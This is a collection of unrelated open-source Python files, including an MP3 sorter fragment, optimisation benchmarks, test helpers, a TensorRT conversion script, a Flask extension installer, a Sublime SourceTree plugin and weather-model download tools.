if vlevel > 1:
print(gerpath)
print(artpath)
print(albpath)
if not os.path.exists(artpath):
os.mkdir(artpath)
os.mkdir(albpath)
if vlevel > 1:
print(artpath)
print(albpath)
if not os.path.exists(albpath):
os.mkdir(albpath)
if vlevel > 1:
print(albpath)
if vlevel > 0:
print("MP3 File is %s" % mp3file)
print("Move to %s" % albpath+"/"+os.path.basename(mp3file))
basename = albpath+"/"+os.path.basename(mp3file)
if not os.path.exists(basename):
shutil.move(mp3file, basename)
else:
shutil.move(mp3file, albpath+"/"+str(uuid.uuid1())+".mp3")
except:
albpath = os.path.join(dest, "unsorted")
if not os.path.exists(albpath+"/"):
os.mkdir(albpath)
n = str(uuid.uuid1())
shutil.move(mp3file, albpath+"/"+n+".mp3")
| 4,059 |
benchmarks/hard_to_optimize_functions/six_hump_camel_2d.py
|
cristianmatache/HOLA
| 10 |
2169570
|
# Copyright 2021 BlackRock, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import cast
import numpy as np
import numpy.typing as npt
def six_hump_camel(x1: float, x2: float) -> float:
"""https://www.sfu.ca/~ssurjano/camel6.html."""
term1 = (4 - 2.1 * np.power(x1, 2) + np.power(x1, 4) / 3) * np.power(x1, 2)
term2 = x1 * x2
term3 = (-4 + 4 * np.power(x2, 2)) * np.power(x2, 2)
return cast(float, term1 + term2 + term3)
def six_hump_camel_np(x: npt.NDArray[np.floating]) -> float:
if len(x) != 2:
raise AssertionError("Exactly 2 items expected")
return six_hump_camel(x[0], x[1])
| 1,130 |
cloudify_deployment_proxy/tests/base.py
|
btcfy/cloudify-utilities-plugin
| 0 |
2172508
|
# Copyright (c) 2017 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import mock
import testtools
from cloudify.state import current_ctx
from cloudify.mocks import MockCloudifyContext
from cloudify_rest_client.exceptions import CloudifyClientError
REST_CLIENT_EXCEPTION = \
mock.MagicMock(side_effect=CloudifyClientError('Mistake'))
DEPLOYMENT_PROXY_PROPS = {
'resource_config': {
'blueprint': {
'id': '',
'blueprint_archive': 'URL',
'main_file_name': 'blueprint.yaml'
},
'deployment': {
'id': '',
'inputs': {},
'outputs': {
'output1': 'output2'
}
}
}
}
DEPLOYMENT_PROXY_TYPE = 'cloudify.nodes.DeploymentProxy'
class DeploymentProxyTestBase(testtools.TestCase):
def tearDown(self):
current_ctx.clear()
super(DeploymentProxyTestBase, self).tearDown()
def get_mock_ctx(self,
test_name,
test_properties=DEPLOYMENT_PROXY_PROPS,
node_type=DEPLOYMENT_PROXY_TYPE,
retry_number=0):
test_node_id = test_name
test_properties = test_properties
operation = {
'retry_number': retry_number
}
ctx = MockCloudifyContext(
node_id=test_node_id,
deployment_id=test_name,
operation=operation,
properties=test_properties
)
ctx.operation._operation_context = {'name': 'some.test'}
ctx.node.type_hierarchy = ['cloudify.nodes.Root', node_type]
try:
ctx.node.type = node_type
except AttributeError:
ctx.logger.error('Failed to set node type attribute.')
return ctx
| 2,342 |
101-200/141-150/144-BSTPreorderTraversal/BSTPreorderTraversal.py
|
xuychen/Leetcode
| 0 |
2173122
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution(object):
def preorderTraversal(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
result = []
self.helper(root, result)
return result
def helper(self, node, result):
if node:
result.append(node.val)
self.helper(node.left, result)
self.helper(node.right, result)
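
# Minimal usage sketch (not part of the LeetCode submission). TreeNode is only
# given as a comment above, so a matching definition is assumed here for the demo.
if __name__ == "__main__":
    class TreeNode(object):
        def __init__(self, val=0, left=None, right=None):
            self.val = val
            self.left = left
            self.right = right

    root = TreeNode(1)
    root.right = TreeNode(2)
    root.right.left = TreeNode(3)
    print(Solution().preorderTraversal(root))  # expected output: [1, 2, 3]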
| 596 |
test/test_mintest.py
|
dutille/doconce
| 305 |
2173137
|
"""Minimalistic set of unit tests for DocOnce."""
from __future__ import print_function
from builtins import range
# Note: test.verify is a full test, but requires *a lot* of dependencies.
# This test can be run with an install of plain DocOnce code (even not
# preprocess and mako are used).
import os, shutil
def pydiff(text1, text2, text1_name='text1', text2_name='text2',
prefix_diff_files='tmp_diff', n=3):
"""
Use Python's ``difflib`` module to compute the difference
between strings `text1` and `text2`.
Produce text and html diff in files with `prefix_diff_files`
as prefix. The `text1_name` and `text2_name` arguments can
be used to label the two texts in the diff output files.
No files are produced if the texts are equal.
"""
if text1 == text2:
return False
# Else:
import difflib, time, os
text1_lines = text1.splitlines()
text2_lines = text2.splitlines()
diff_html = difflib.HtmlDiff().make_file(
text1_lines, text2_lines, text1_name, text2_name,
context=True, numlines=n)
diff_plain = difflib.unified_diff(
text1_lines, text2_lines, text1_name, text2_name, n=n)
filename_plain = prefix_diff_files + '.txt'
filename_html = prefix_diff_files + '.html'
f = open(filename_plain, 'w')
# Need to add newlines despite doc saying that trailing newlines are
# inserted...
diff_plain = [line + '\n' for line in diff_plain]
f.writelines(diff_plain)
f.close()
f = open(filename_html, 'w')
f.writelines(diff_html)
f.close()
return True
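
# Usage sketch (comments only, so nothing runs at import time): compare two
# strings and write tmp_diff.txt / tmp_diff.html when they differ. The texts
# below are made-up examples.
#
#   differs = pydiff('a\nb\nc', 'a\nB\nc', 'old', 'new')
#   # differs is True and tmp_diff.txt / tmp_diff.html are written;
#   # with identical inputs pydiff returns False and writes nothing.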
def assert_equal_text(text1, text2,
text1_name='text1', text2_name='text2',
prefix_diff_files='tmp_diff',
msg=''):
if msg != '' and msg[-1] not in ('.', '?', ':', ';', '!'):
msg += '.'
if msg != '':
msg += '\n'
msg += 'Load tmp_diff.html into a browser to see differences.'
assert not pydiff(text1, text2, text1_name, text2_name,
prefix_diff_files, n=3), msg
def assert_equal_files(file1, file2,
text1_name='text1', text2_name='text2',
prefix_diff_files='tmp_diff',
msg=''):
text1 = open(file1, 'r').read()
text2 = open(file2, 'r').read()
assert_equal_text(text1, text2,
text1_name=file1, text2_name=file2,
prefix_diff_files=prefix_diff_files,
msg=msg)
# ---- Here goes the tests -----
def test_mintest_html():
filename = '_ref_mintest_bluegray'
shutil.copy('mintest.do.txt', filename + '.do.txt')
cmd = 'doconce format html %s --html_style=bootstrap_bluegray --html_output=%s' % (filename, filename)
failure = os.system(cmd)
if failure:
assert False, 'Could not run %s' % cmd
cmd = 'doconce split_html %s.html' % filename
failure = os.system(cmd)
if failure:
assert False, 'Could not run %s' % cmd
filenames = [filename+'.html'] + ['._%s%03d.html' % (filename, i)
for i in range(4)]
for filename in filenames:
assert_equal_files(filename,
os.path.join('mintest', filename))
print('------- end of html test ------------')
def test_mintest_latex():
filename = '_ref_mintest'
shutil.copy('mintest.do.txt', filename + '.do.txt')
cmd = 'doconce format pdflatex %s --latex_code_style=vrb' % filename
failure = os.system(cmd)
if failure:
assert False, 'Could not run %s' % cmd
filenames = [filename+'.tex']
for filename in filenames:
assert_equal_files(filename, os.path.join('mintest', filename))
print('------- end of latex test ------------')
def test_mintest_plain():
filename = '_ref_mintest'
shutil.copy('mintest.do.txt', filename + '.do.txt')
cmd = 'doconce format plain %s' % filename
failure = os.system(cmd)
if failure:
assert False, 'Could not run %s' % cmd
filenames = [filename+'.txt']
for filename in filenames:
assert_equal_files(filename, os.path.join('mintest', filename))
print('------- end of plain text test ------------')
def test_mintest_ipynb():
filename = '_ref_mintest'
shutil.copy('mintest.do.txt', filename + '.do.txt')
cmd = 'doconce format ipynb %s' % filename
failure = os.system(cmd)
if failure:
assert False, 'Could not run %s' % cmd
filenames = [filename+'.ipynb']
for filename in filenames:
assert_equal_files(filename, os.path.join('mintest', filename))
print('------- end of plain text test ------------')
if __name__ == '__main__':
test_mintest_html()
test_mintest_latex()
test_mintest_plain()
test_mintest_ipynb()
| 4,810 |
lib/helper.py
|
vane/static-site-generator
| 0 |
2173185
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import os
import lib.config
import urllib.parse
class FunctionHelper:
@staticmethod
def join(a, b=','):
return b.join(a)
@staticmethod
def relative_url(a):
return lib.config.Config.CONFIG['baseurl']+a
@staticmethod
def replace(a, b, c):
return a.replace(b, c)
@staticmethod
def escape(a):
return urllib.parse.quote(a)
@staticmethod
def cgi_escape(a):
return a
@staticmethod
def date(a, b):
return a.strftime(b)
@staticmethod
def truncatewords(a, b):
return ' '.join(''.join(a).split(' ')[:b])+'...'
@staticmethod
def highlight(*args, **kwargs):
return ''
def get_helpers():
method_list = [func for func in dir(FunctionHelper) if callable(getattr(FunctionHelper, func)) and not func.startswith('__')]
helpers = {}
for key in method_list:
helpers[key] = getattr(FunctionHelper, key)
return helpers
def write_file(path, data):
with open(path, 'wb') as f:
f.write(data.encode('utf-8'))
def read_file(path):
with open(path) as f:
data = f.read()
return data
def makedirs(path):
os.makedirs(path, exist_ok=True)
def join_path(path, *paths):
return os.path.join(path, *paths)
def strip_tags(data):
return re.sub('<[^<]+?>', '', data).strip()
| 1,400 |
fffw/encoding/__init__.py
|
tumb1er/fffw
| 4 |
2172225
|
from .codecs import *
from .ffmpeg import *
from .filters import *
from .inputs import *
from .outputs import *
| 112 |
model/bisenet/cityscapes.bisenet.R18.speed/onnx2trt.py
|
windyrobin/TorchSeg
| 3 |
2172799
|
# encoding=utf8
# install tensorrt 4.0 first
# tar -xzvf TensorRT-xxxx.Ubuntu-16.04.3.cuda-9.0.tar.gz
# add TensorRT-xxx/lib to bashrc
# sudo pip install the tensorrt-xxx-cp27-cp27mu-linux_x86_64.whl in uff folder
# sudo pip install the whl in graphsurgeon folder
# sudo pip install the whl in python folder
from __future__ import print_function
import sys
import json
import os
import common
import tensorrt as trt
import onnx
#from tensorrt.parsers import uffparser
#import pycuda.driver as cuda
#trt5
TRT_LOGGER = trt.Logger(trt.Logger.WARNING)
#trt4
#G_LOGGER = trt.infer.ConsoleLogger(trt.infer.LogSeverity.ERROR)
def build_engine(model_file):
# For more information on TRT basics, refer to the introductory samples.
#parser = uffparser.create_uff_parser()
with trt.Builder(TRT_LOGGER) as builder, builder.create_network() as network, trt.OnnxParser(network, TRT_LOGGER) as parser:
# Parse the Uff Network
builder.max_workspace_size = common.GiB(2)
with open(model_file, 'rb') as model:
parser.parse(model.read())
print('parser errors: ', parser.num_errors)
for i in range(parser.num_errors):
err = parser.get_error(i)
print(err)
tensor = network.get_input(0)
print(tensor.name)
print(tensor.shape)
print("layers: %d".format(network.num_layers))
print("inputs: %d".format(network.num_inputs))
print("outputs: %d".format(network.num_outputs))
##network.mark_output(network.get_layer(network.num_layers - 1).get_output(0))
return builder.build_cuda_engine(network)
if __name__=='__main__':
model = onnx.load('./bisenet.onnx')
# Check that the IR is well formed
#onnx.checker.check_model(model)
# Print a human readable representation of the graph
#onnx.helper.printable_graph(model.graph)
engine = build_engine('./bisenet.onnx')
# Build an engine, allocate buffers and create a stream.
# For more information on buffer allocation, refer to the introductory samples.
#inputs, outputs, bindings, stream = allocate_buffers(engine)
#context = engine.create_execution_context()
| 2,186 |
reamber/algorithms/convert/SMToOsu.py
|
Bestfast/reamberPy
| 0 |
2173290
|
from typing import List
from reamber.base.Bpm import Bpm
from reamber.osu.OsuBpm import OsuBpm
from reamber.osu.OsuHit import OsuHit
from reamber.osu.OsuHold import OsuHold
from reamber.osu.OsuMap import OsuMap
from reamber.osu.lists.OsuBpmList import OsuBpmList
from reamber.osu.lists.OsuNotePkg import OsuNotePkg
from reamber.osu.lists.notes.OsuHitList import OsuHitList
from reamber.osu.lists.notes.OsuHoldList import OsuHoldList
from reamber.sm.SMMapSet import SMMapSet, SMMap
class SMToOsu:
OFFSET = 68
@staticmethod
def convert(sm: SMMapSet) -> List[OsuMap]:
""" Converts a SMMapset to possibly multiple osu maps
Note that a mapset contains maps, so a list would be expected.
SMMap conversion is not possible due to lack of SMMapset Metadata
:param sm:
:return:
"""
# I haven't tested with non 4 keys, so it might explode :(
osuMapSet: List[OsuMap] = []
for smMap in sm.maps:
assert isinstance(smMap, SMMap)
hits: List[OsuHit] = []
holds: List[OsuHold] = []
# Note Conversion
for hit in smMap.notes.hits():
hits.append(OsuHit(offset=hit.offset, column=hit.column))
for hold in smMap.notes.holds():
holds.append(OsuHold(offset=hold.offset, column=hold.column, _length=hold.length))
bpms: List[Bpm] = []
# Timing Point Conversion
for bpm in smMap.bpms:
bpms.append(OsuBpm(offset=bpm.offset, bpm=bpm.bpm))
# Extract Metadata
osuMap = OsuMap(
backgroundFileName=sm.background,
title=sm.title,
titleUnicode=sm.titleTranslit,
artist=sm.artist,
artistUnicode=sm.artistTranslit,
audioFileName=sm.music,
creator=sm.credit,
version=f"{smMap.difficulty} {smMap.difficultyVal}",
previewTime=int(sm.sampleStart),
bpms=OsuBpmList(bpms),
notes=OsuNotePkg(hits=OsuHitList(hits),
holds=OsuHoldList(holds))
)
osuMapSet.append(osuMap)
return osuMapSet
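
# Usage sketch (comments only): this module only covers the conversion step, so
# the load and write calls below are assumptions for illustration, not APIs
# defined here.
#
#   sm = SMMapSet.readFile("chart.sm")          # hypothetical load step
#   for i, osu_map in enumerate(SMToOsu.convert(sm)):
#       osu_map.writeFile(f"chart_{i}.osu")     # hypothetical write step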
| 2,257 |
pp/util.py
|
mdawso04/pandas-plotly
| 0 |
2172735
|
import pandas as pd
from pathlib import Path
from pp.log import logger
from inspect import signature
#from types import MappingProxyType
from collections import OrderedDict
#SERVICES DIRECTORY
SERVICES = {}
#SERVICE KEYS
# type, number of selections possible
OPTION_FIELD_SINGLE_COL_ANY = (None, 1)
OPTION_FIELD_MULTI_COL_ANY = (None, None)
OPTION_FIELD_SINGLE_COL_NUMBER = ('number', 1)
OPTION_FIELD_MULTI_COL_NUMBER = ('number', None)
OPTION_FIELD_SINGLE_COL_STRING = ('object', 1)
OPTION_FIELD_MULTI_COL_STRING = ('object', None)
OPTION_FIELD_SINGLE_BOOLEAN = ('boolean', 1)
OPTION_FIELD_SINGLE_COLORSWATCH = ('colorswatch', 1)
OPTION_FIELDS = []
OPTION_FIELDS.extend([
OPTION_FIELD_SINGLE_COL_ANY,
OPTION_FIELD_MULTI_COL_ANY,
OPTION_FIELD_SINGLE_COL_NUMBER,
OPTION_FIELD_MULTI_COL_NUMBER,
OPTION_FIELD_SINGLE_COL_STRING,
OPTION_FIELD_MULTI_COL_STRING,
OPTION_FIELD_SINGLE_BOOLEAN,
OPTION_FIELD_SINGLE_COLORSWATCH,
])
FIELD_STRING = 'string'
FIELD_INTEGER = 'int'
FIELD_NUMBER = 'number'
FIELD_FLOAT = 'float'
class Service(object):
def __init__(self, fn, d):
self.name = fn.__name__
self.fn = fn
self._d = d
def options(self, df):
#TODO: orderedDict
return {k: (colHelper(df, type=v[0], colsOnNone=True) if v in OPTION_FIELDS else None) for k, v in self._d.items()}
def registerService(**d):
def inner(fn):
def service_group(service_name):
gr = extractGroup(service_name)
if gr not in SERVICES.keys():
SERVICES[gr] = {}
return SERVICES[gr]
service_group(fn.__name__)[fn.__name__] = Service(fn, d)
logger.debug('pp.util > registerService: Registered Service: {}'.format(fn.__name__))
return fn
return inner
# ## UTILITIES ###
def service_helper(groups=None, return_type='group_service_callable'):
if isinstance(groups, str):
groups = [groups]
elif isinstance(groups, list):
groups = groups
else:
groups = None
if groups is None:
filtered_services = SERVICES
else:
filtered_services = {g: SERVICES[g] for g in groups if g in SERVICES.keys()}
if return_type=='group_service_callable':
return filtered_services
elif return_type=='group_service_names':
return {k: list(v.keys()) for k, v in filtered_services.items()}
elif return_type=='service_callable':
return {k: v for dic in filtered_services.values() for k, v in dic.items()}
return "SERVICE NOT FOUND"
def extractGroup(service):
if not isinstance(service, str):
return None
return service.split('_', 1)[0].lower()
def removeElementsFromList(l1, l2):
'''Remove from list1 any elements also in list2'''
# if not list type ie string then covert
if not isinstance(l1, list):
list1 = []
list1.append(l1)
l1 = list1
if not isinstance(l2, list):
list2 = []
list2.append(l2)
l2 = list2
return [i for i in l1 if i not in l2]
def commonElementsInList(l1, l2):
if l1 is None or l2 is None: return None
if not isinstance(l1, list): l1 = [l1]
if not isinstance(l2, list): l2 = [l2]
return [i for i in l1 if i in l2]
def colHelper(df, columns=None, max=None, type=None, colsOnNone=True, forceReturnAsList=True):
if isinstance(columns, tuple):
columns = list(columns)
# pre-process: translate to column names
if isinstance(columns, slice) or isinstance(columns, int):
columns = df.columns.values.tolist()[columns]
elif isinstance(columns, list) and all(isinstance(c, int) for c in columns):
columns = df.columns[columns].values.tolist()
# process: limit possible columns by type (number, object, datetime)
df1 = df.select_dtypes(include=type) if type is not None else df
#process: fit to limited column scope
if colsOnNone == True and columns is None: columns = df1.columns.values.tolist()
elif columns is None: return None
else: columns = commonElementsInList(columns, df1.columns.values.tolist())
# apply 'max' check
if isinstance(columns, list) and max != None:
if max == 1: columns = columns[0]
else: columns = columns[:max]
# if string format to list for return
if forceReturnAsList and not isinstance(columns, list):
columns = [columns]
return columns
def colValues(df, col):
cv = df[col].unique()
return cv
def toMultiIndex(df):
if isinstance(df.columns, pd.MultiIndex):
arrays = [range(0, len(df.columns)), df.columns.get_level_values(0), df.dtypes]
mi = pd.MultiIndex.from_arrays(arrays, names=('Num', 'Name', 'Type'))
else:
arrays = [range(0, len(df.columns)), df.columns, df.dtypes]
mi = pd.MultiIndex.from_arrays(arrays, names=('Num', 'Name', 'Type'))
df.columns = mi
return df
def toSingleIndex(df):
if isinstance(df.columns, pd.MultiIndex):
df.columns = df.columns.get_level_values(1)
return df
def rowHelper(df, max = None, head = True):
if max is None: return df
else:
if head is True: return df.head(max)
else: return df.tail(max)
def toUniqueColName(df, name):
n = 1
name = str(name)
while name in df.columns.values.tolist():
name = name + '_' + str(n)
return name
def pathHelper(path, filename):
import os
if path == None:
        home = str(Path.home())
path = os.path.join(home, 'report')
else:
path = os.path.join(path, 'report')
os.makedirs(path, exist_ok = True)
path = os.path.join(path, filename)
return path
| 5,687 |
src/flask_batteries/installers/base_installer.py
|
graydenshand/flask_boot
| 1 |
2172855
|
import click
import os
import subprocess
import re
import sys
from ..config import PATH_TO_VENV, TAB
from ..helpers import *
class FlaskExtInstaller:
package_name = None
imports = []
inits = []
attachments = []
shell_vars = []
decorators = []
base_config = {}
production_config = {}
development_config = {}
testing_config = {}
pypi_dependencies = []
envs = {}
@classmethod
def install(cls):
# Prevent installing same package twice
if cls.verify():
raise InstallError(f"{cls.package_name} is already installed")
# Install package from PyPI
if cls.package_name is not None:
subprocess.run(
[pip(), "install", "-q", "-q", cls.package_name]
+ cls.pypi_dependencies,
stdout=subprocess.DEVNULL,
)
subprocess.run(
f"{pip()} freeze -q -q > requirements.txt",
stdout=subprocess.DEVNULL,
shell=True,
)
# Edit __init__.py
add_to_init(
imports=cls.imports,
initializations=cls.inits,
attachments=cls.attachments,
shell_vars=cls.shell_vars,
decorators=cls.decorators,
)
# Edit config.py
add_to_config(
base_config=cls.base_config,
production_config=cls.production_config,
development_config=cls.development_config,
testing_config=cls.testing_config,
)
# Add envs
set_env_vars(**cls.envs)
@classmethod
def uninstall(cls):
if cls.package_name is not None:
# Uninstall package from PyPI
subprocess.run(
[pip(), "uninstall", "-q", "-q", "-y", cls.package_name]
+ cls.pypi_dependencies,
stdout=subprocess.DEVNULL,
)
subprocess.run(
f"{pip()} freeze -q -q > requirements.txt",
stdout=subprocess.DEVNULL,
shell=True,
)
# Remove initialization from __init__.py and create_app() func
lines_to_remove = (
cls.imports + cls.inits + cls.attachments + cls.shell_vars + cls.decorators
)
remove_from_file(os.path.join("src", "__init__.py"), lines_to_remove)
# Edit config.py
lines_to_remove = (
list(cls.base_config.keys())
+ list(cls.production_config.keys())
+ list(cls.development_config.keys())
+ list(cls.testing_config.keys())
)
remove_from_file(os.path.join("src", "config.py"), lines_to_remove)
# Remove env vars
rm_env_vars(**cls.envs)
@classmethod
def verify(cls, raise_for_error=False):
        # Verify package is installed from PyPI
if cls.package_name is not None:
reqs = subprocess.check_output(f"{pip()} freeze -q -q", shell=True)
installed_packages = [
r.decode().split("==")[0].lower() for r in reqs.split()
]
if cls.package_name.lower() not in installed_packages:
if raise_for_error:
raise InstallError(f"{cls.package_name} not installed from PyPI")
return False
# Verify __init__.py
lines_to_verify = (
cls.imports + cls.inits + cls.attachments + cls.shell_vars + cls.decorators
)
if not verify_file(
os.path.join("src", "__init__.py"), lines_to_verify, raise_for_error=True
):
return False
# Verify config.py
lines_to_verify = (
list(cls.base_config.keys())
+ list(cls.production_config.keys())
+ list(cls.development_config.keys())
+ list(cls.testing_config.keys())
)
if not verify_file(
os.path.join("src", "config.py"),
lines_to_verify,
raise_for_error=raise_for_error,
):
return False
# Verify ENVS
with open(activate(), "r") as f:
body = f.read()
for k, v in cls.envs.items():
pattern = rf"(use|export) {k}=(.*)\n"
if re.search(pattern, body) is None:
if raise_for_error:
raise InstallError(f"{cls} ENVs missing from venv activate")
return False
return True
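
# Illustrative subclass sketch (comments only, not part of this module): the
# class attributes are the whole configuration surface of FlaskExtInstaller.
# The package name, import line and init/attach snippets below are assumptions
# chosen purely for illustration.
#
#   class FlaskSQLAlchemyInstaller(FlaskExtInstaller):
#       package_name = "Flask-SQLAlchemy"
#       imports = ["from flask_sqlalchemy import SQLAlchemy"]
#       inits = ["db = SQLAlchemy()"]
#       attachments = ["db.init_app(app)"]
#
#   FlaskSQLAlchemyInstaller.install()   # pip-installs and edits __init__.py / config.py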
| 4,485 |
OpenInSourceTree.py
|
voidius/sublime-open-in-sourcetree
| 1 |
2172961
|
import os
import locale
import subprocess
import sublime, sublime_plugin
class OpenInSourcetreeCommand(sublime_plugin.WindowCommand):
FALLBACK_STREE_PATH = '/usr/local/bin/stree'
FALLBACK_STREE_MAC_PATH = '/Applications/SourceTree.app'
settings = sublime.load_settings('OpenInSourceTree.sublime-settings')
def run(self, *args):
sublime.status_message(__name__ + ': running')
stree_path = self.get_stree_path()
path = self.get_path()
if path in ['', None]:
sublime.status_message(__name__ + ': No place to open SourceTree to')
return False
if stree_path in ['', None]:
sublime.error_message(__name__ + ': No SourceTree executable found: is it installed?')
return False
if self.settings.get('detect_git', True):
path = self.get_git_path(path)
if stree_path.endswith(".app"):
subprocess.call(['open', '-a', stree_path, path])
else:
subprocess.Popen([stree_path], cwd=path.encode(locale.getpreferredencoding(do_setlocale=True)), shell=True)
def get_git_path(self, initial_path):
git_path = initial_path
while ('.git' not in os.listdir(git_path)) and (git_path != '/'):
git_path = os.path.dirname(git_path)
if git_path != '/':
return git_path
else:
return initial_path
def get_path(self):
if self.window.active_view():
path = self.window.active_view().file_name()
elif self.window.folders():
path = self.window.folders()[0]
else:
return None
if os.path.isfile(path):
path = os.path.dirname(path)
return path
def get_stree_path(self):
stree_path = self.settings.get('stree_path', self.FALLBACK_STREE_PATH)
if stree_path == None:
stree_path = self.FALLBACK_STREE_PATH
if not os.path.isfile(stree_path):
mac_path = self.FALLBACK_STREE_MAC_PATH
if os.path.isdir(mac_path):
stree_path = mac_path
else:
stree_path = None
return stree_path
| 2,200 |
src/dyncommands/exceptions.py
|
Cubicpath/dyncommands
| 1 |
2173235
|
###################################################################################################
# MIT Licence (C) 2022 Cubicpath@Github #
###################################################################################################
"""Exceptions raised during parsing."""
from typing import Optional
from .models import *
__all__ = (
'CommandError',
'DisabledError',
'ImproperUsageError',
'NoPermissionError',
'NotFoundError',
'UnrestrictedWarning',
)
class UnrestrictedWarning(UserWarning):
"""Warns when commands will be run as unrestricted."""
class CommandError(Exception):
"""General exception for :py:class:`Node` execution."""
def __init__(self, command: Optional[Node], context: CommandContext, parent: Exception = None, message: str = None) -> None:
self.command: Optional[Node] = command
self.context: CommandContext = context
self.parent: Exception = parent
name = command.name if command else 'Unknown'
super().__init__(f"'{context.source.display_name}' failed executing the '{name}' command." if message is None else message)
class DisabledError(CommandError):
"""Error when attempting to execute a disabled :py:class:`Node`."""
def __init__(self, command: Node, context: CommandContext) -> None:
super().__init__(command, context, self, f"'{command.name}' is disabled, enable to execute.")
class ImproperUsageError(CommandError):
"""Error for when a :py:class:`Node` is improperly used (manually triggered by :py:class:`Node`)."""
def __init__(self, command: Node, context: CommandContext, message: str = None) -> None:
super().__init__(command, context, self, f"Incorrect usage of '{command.name}'. To view usage information, use '!#prefix#!help "
f"{command.name}'." if message is None else message)
class NoPermissionError(CommandError):
"""Error for attempting to execute a :py:class:`Node` without required permissions."""
def __init__(self, command: Node, context: CommandContext) -> None:
super().__init__(command, context, self, f"'{context.source.display_name}' did not have the required permissions "
f"({context.source.permission}/{command.permission}) to use the '{command.name}' command.")
class NotFoundError(CommandError):
"""Error executing a non-existent :py:class:`Node` name."""
def __init__(self, name: str, context: CommandContext) -> None:
super().__init__(None, context, self, f"'{name}' is not a registered command.")
| 2,677 |
Ago-Dic-2019/Luis Llanes/Practica1/ejercicio4-5.py
|
Arbupa/DAS_Sistemas
| 41 |
2173006
|
# Make a list from 1 to 1,000,000 and then use min and max to verify it
listanumeros=[]
for i in range(0,1000000):
listanumeros.append(i+1)
print("Numero menor:", min(listanumeros))
print("Numero mayor:", max(listanumeros))
print("Suma de todos:", sum(listanumeros))
# the result returned by sum is almost instantaneous: 500000500000
| 348 |
herbie/tools.py
|
gitter-badger/Herbie
| 0 |
2170700
|
## <NAME>
## May 3, 2021
"""
============
Herbie Tools
============
"""
from datetime import datetime, timedelta
import pandas as pd
import xarray as xr
from herbie.archive import Herbie
def bulk_download(
DATES,
searchString=None,
*,
fxx=range(0, 1),
model="hrrr",
product="sfc",
priority=None,
verbose=True,
):
"""
Bulk download GRIB2 files from file source to the local machine.
Iterates over a list of datetimes (DATES) and forecast lead times (fxx).
Parameters
----------
DATES : list
List of datetimes
searchString : None or str
If None, download the full file. If string, use regex to search
index files for variables and levels of interest and only
download the matched GRIB messages.
fxx : int or list
List of forecast lead times to download. Default only downloads model analysis.
model : {'hrrr', 'hrrrak', 'rap'}
Model to download.
product : {'sfc', 'prs', 'nat', 'subh'}
Variable products file to download. Not needed for RAP model.
"""
if isinstance(DATES, (str, pd.Timestamp)) or hasattr(DATES, "strptime"):
DATES = [DATES]
if isinstance(fxx, int):
fxx = [fxx]
kw = dict(model=model, product=product)
if priority is not None:
kw["priority"] = priority
# Locate the file sources
print("👨🏻🔬 Check which requested files exists")
grib_sources = [Herbie(d, fxx=f, **kw) for d in DATES for f in fxx]
loop_time = timedelta()
n = len(grib_sources)
print("\n🌧 Download requested data")
for i, g in enumerate(grib_sources):
timer = datetime.now()
g.download(searchString=searchString)
# ---------------------------------------------------------
# Time keeping: *crude* method to estimate remaining time.
# ---------------------------------------------------------
loop_time += datetime.now() - timer
mean_dt_per_loop = loop_time / (i + 1)
remaining_loops = n - i - 1
est_rem_time = mean_dt_per_loop * remaining_loops
if verbose:
print(
f"🚛💨 Download Progress: [{i+1}/{n} completed] >> Est. Time Remaining {str(est_rem_time):16}\n"
)
# ---------------------------------------------------------
requested = len(grib_sources)
completed = sum([i.grib is None for i in grib_sources])
print(f"🍦 Done! Downloaded [{completed}/{requested}] files. Timer={loop_time}")
return grib_sources
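
# Usage sketch (comments only; the dates and searchString below are arbitrary
# examples, not values taken from this module):
#
#   DATES = pd.date_range("2021-05-01 00:00", periods=3, freq="1H")
#   files = bulk_download(DATES, searchString="TMP:2 m", fxx=range(0, 2),
#                         model="hrrr", product="sfc")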
def xr_concat_sameRun(DATE, searchString, fxx=range(0, 18)):
"""
Load and concatenate xarray objects by forecast lead time for the same run.
Parameters
----------
DATE : pandas-parsable datetime
A datetime that represents the model initialization time.
searchString : str
Variable fields to load. This really only works if the search
string returns data on the same hyper cube.
fxx : list of int
List of forecast lead times, in hours, to concat together.
"""
Hs_to_cat = [Herbie(DATE, fxx=f).xarray(searchString) for f in fxx]
return xr.concat(Hs_to_cat, dim="f")
def xr_concat_sameLead(DATES, searchString, fxx=0, DATE_is_valid_time=True):
"""
Load and concatenate xarray objects by model initialization date for the same lead time.
Parameters
----------
DATES : list of pandas-parsable datetime
Datetime that represents the model valid time.
searchString : str
Variable fields to load. This really only works if the search
string returns data on the same hyper cube.
fxx : int
The forecast lead time, in hours.
"""
Hs_to_cat = [
Herbie(DATE, fxx=fxx, DATE_is_valid_time=DATE_is_valid_time).xarray(
searchString
)
for DATE in DATES
]
return xr.concat(Hs_to_cat, dim="t")
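
# Usage sketch (comments only; dates and the searchString are arbitrary examples):
#
#   # One model run, lead times f00-f05, stacked along the new "f" dimension:
#   ds_run = xr_concat_sameRun("2021-05-01 00:00", "TMP:2 m", fxx=range(0, 6))
#
#   # One lead time across several valid times, stacked along "t":
#   valid = pd.date_range("2021-05-01 00:00", periods=4, freq="1H")
#   ds_lead = xr_concat_sameLead(valid, "TMP:2 m", fxx=6)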
| 3,905 |
generatepdf417/pdf147.py
|
john526/codePython
| 0 |
2172993
|
from pdf417 import render_image,render_svg, encode
from message import director
def generatepdf417():
enc = encode(director, columns=15, security_level=7)
name_417 = "first417.jpg"
image_render = render_image(enc)
image_render.show()
image_render.save(name_417)
| 286 |
setup.py
|
gboehl/emcwrap
| 0 |
2166302
|
from setuptools import setup, find_packages
from os import path
# read the contents of the README file
